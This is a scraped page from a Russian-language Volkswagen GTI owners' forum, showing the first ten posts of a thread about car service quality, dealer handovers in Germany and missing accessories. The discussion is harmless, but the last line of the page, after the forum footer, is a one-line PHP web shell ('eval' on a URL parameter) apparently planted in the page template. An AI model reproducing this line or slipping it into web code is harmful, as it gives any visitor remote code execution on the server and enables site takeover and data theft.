+ Ответить в теме
Страница 1 из 34 1 2 3 11 ... ПоследняяПоследняя
Показано с 1 по 10 из 334

Тема: Сервис


  1. #1
    GTI-Racing IvanGTIV is on a distinguished road Аватар для IvanGTIV
    Регистрация
    06.10.2006
    Машина
    GTI V DSG, REVO, H&R, KONI sport, H2sport, Goodridge, RBF600, DS2500, ATE PowerDisc, OZ racing
    Сообщений
    1,885
    О!
    Уже пять (шесть учитывая гараж Gomkv).
    Подтягивайте все кто кого знает. (Скрудж, constantinus, Gomkv здесь по моей наводке)
    Насчет обслуживания - в Автомире на Бориспольской нормальное отношение, оч. мне нравится директор СТО - всегда готов помочь итд., и скидку какую никакую дают. Но тоже надо следить, а то мне при замене масла мастер предложил заводить мотор не собрав воздуховод и не подключив датчики. Не думаю, что где-то есть идеальное СТО. Но хуже когда в ремзону принципиально не пускают и отношение мягко говоря равнодушное (Атлант-М на Лепсе).

  2. #2
    GTI-Racing IvanGTIV is on a distinguished road Аватар для IvanGTIV
    Регистрация
    06.10.2006
    Машина
    GTI V DSG, REVO, H&R, KONI sport, H2sport, Goodridge, RBF600, DS2500, ATE PowerDisc, OZ racing
    Сообщений
    1,885
    <div class='quotetop'>Цитата(constantinus &#064; Nov 27 2007, 18&#58;39) <{POST_SNAPBACK}></div><div class='quotemain'>Сервис рулит у нас)[/b][/quote]

    Сервис рулит везде. Забирал свой авто у офиц. дилера в Германии

    1) открывашка в минусе
    2) зазор 5-той двери был такой, что с одной стороны можно было пользоваться багажником не открывая дверь.
    3) ну и напоследок. Крышка центрального воздуховода (сверху на торпедо) слева имела обломанные крепления и, внимание, была посажена на герметик. Отчего левая сторона периодически "всплывала"из торпедо.

    Пункты 1) и 3) устранял на свои собственные деньги (о чем сейчас жалею - надо было написать на завод)

    напомню, речь о передаче клиенту новой машины официальным дилером VW в Германии

  3. #3
    <div class='quotetop'>Цитата(IvanGTIV &#064; Nov 27 2007, 19&#58;57) <{POST_SNAPBACK}></div><div class='quotemain'>Сервис рулит везде. Забирал свой авто у офиц. дилера в Германии

    1) открывашка в минусе
    2) зазор 5-той двери был такой, что с одной стороны можно было пользоваться багажником не открывая дверь.
    3) ну и напоследок. Крышка центрального воздуховода (сверху на торпедо) слева имела обломанные крепления и, внимание, была посажена на герметик. Отчего левая сторона периодически "всплывала"из торпедо.

    Пункты 1) и 3) устранял на свои собственные деньги (о чем сейчас жалею - надо было написать на завод)

    напомню, речь о передаче клиенту новой машины официальным дилером VW в Германии[/b][/quote]
    на обеих открывыалка была про крышку багажника согласен
    3d,5d gti, s3

  4. #4
    GTI-Racing constantinus is on a distinguished road Аватар для constantinus
    Регистрация
    22.09.2007
    Откуда
    Киев
    Машина
    RGTI
    Сообщений
    1,631
    На вопросы:
    А где открывашка и где аптечка?
    Мне только развели руками и сказали - а это все завод.
    Из такого только крючек двери болтался неприкрученным до конца, а так вроде все ок.

  5. #5
    GTI-Racing IvanGTIV is on a distinguished road Аватар для IvanGTIV
    Регистрация
    06.10.2006
    Машина
    GTI V DSG, REVO, H&R, KONI sport, H2sport, Goodridge, RBF600, DS2500, ATE PowerDisc, OZ racing
    Сообщений
    1,885
    вот я и говорю - зря мы ругаем НАШ сервис
    когда описанные мной факты имеют место у офиц. дилера в Германии в 200-ах км от вольфсбурга

    так кто же п---ит наши открывачки?

  6. #6
    Bitch
    Guest Аватар для Bitch
    здесь обсуждаем обслуживание, сервис центры, ремонт и т.д.

  7. #7
    <div class='quotetop'>Цитата(IvanGTIV &#064; Nov 27 2007, 20&#58;28) <{POST_SNAPBACK}></div><div class='quotemain'>вот я и говорю - зря мы ругаем НАШ сервис
    когда описанные мной факты имеют место у офиц. дилера в Германии в 200-ах км от вольфсбурга

    так кто же п---ит наши открывачки?[/b][/quote]
    ФИНЫ :angry:
    3d,5d gti, s3

  8. #8
    <div class='quotetop'>Цитата(Gomkv &#064; Nov 28 2007, 12&#58;26) <{POST_SNAPBACK}></div><div class='quotemain'>ФИНЫ :angry:[/b][/quote]
    врядли фины, мне машину везли с Арабии, открывашечка была, хотя машина прошла через таможенников Ирана, Туркменистана и Узбекистана. Даже книжка сервисная в кожанном переплете есть только не знаю что еще должно было быть в комплектации...огнетушитель ? аптечка ? этого хоз-ва не было...

  9. #9
    <div class='quotetop'>Цитата(umidka &#064; Nov 28 2007, 11&#58;41) <{POST_SNAPBACK}></div><div class='quotemain'>врядли фины, мне машину везли с Арабии, открывашечка была, хотя машина прошла через таможенников Ирана, Туркменистана и Узбекистана. Даже книжка сервисная в кожанном переплете есть только не знаю что еще должно было быть в комплектации...огнетушитель ? аптечка ? этого хоз-ва не было...[/b][/quote]
    ну те тачки что едут на Украину без открывашек остаются у финов а сервиска вродь у всех в кожаном переплете с красной полоской и логом gti
    3d,5d gti, s3

  10. #10
    <div class='quotetop'>Цитата(Gomkv &#064; Nov 28 2007, 12&#58;59) <{POST_SNAPBACK}></div><div class='quotemain'>ну те тачки что едут на Украину без открывашек остаются у финов а сервиска вродь у всех в кожаном переплете с красной полоской и логом gti[/b][/quote]

    ну может просто недоперли где сервиска лежит в бардачке
    так бы если бы что то брал, то сервиску бы забрал, а что открывашка ? открывашка как открывашка

    у вас проблемы это цветочки. у меня сервис не может ЭБУ двигателя прочесть только ошибки, но без параметров. соответственно с определением причины неисправности помочь не могут. а мне остается только на форумах лазить и вопросы задавать

+ Ответить в теме
Страница 1 из 34 1 2 3 11 ... ПоследняяПоследняя

Похожие темы

  1. Ищу нормальный сервис по WAG
    от MORG m-customs в разделе Разное
    Ответов: 22
    Последнее сообщение: 01.12.2018, 15:16
  2. Ищу сервис ЮХ
    от vikeis в разделе Ремонт и обслуживание
    Ответов: 3
    Последнее сообщение: 06.11.2012, 13:52
  3. сервис ebaytoday.ru
    от keks в разделе Курилка
    Ответов: 5
    Последнее сообщение: 12.04.2012, 08:14
  4. Сервис в ЗАО или Одинцово?
    от olegarh в разделе Двигатель
    Ответов: 2
    Последнее сообщение: 24.06.2011, 14:02
  5. Сервис
    от DiGri в разделе Ремонт и обслуживание
    Ответов: 1
    Последнее сообщение: 08.07.2008, 14:30

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}